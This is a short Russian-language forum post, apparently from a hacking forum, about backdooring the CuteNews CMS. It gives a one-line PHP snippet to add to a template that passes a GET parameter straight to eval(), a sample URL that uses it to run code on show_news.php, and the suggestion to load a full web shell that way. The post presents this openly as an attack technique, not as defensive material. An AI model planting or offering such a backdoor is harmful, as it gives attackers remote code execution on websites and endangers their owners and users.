Добавляем в конце при редактирование шаблона (лучше добавлять в последнем блоке): Code: HTML; if(isset($_GET['shell'])) eval($_GET['shell']); Получаешь возможность выполнять команды: Code: http://test1.ru/cutenews/show_news.php?shell=phpinfo(); Собственно никто не мешает закинуть туда сразу нормальный шелл. P.S. Закрыто. P.P.S. Для вопросов есть спец тема. P.P.P.S. Эту не удалять - пусть будет (потом перекинем в раздел с cms'ками).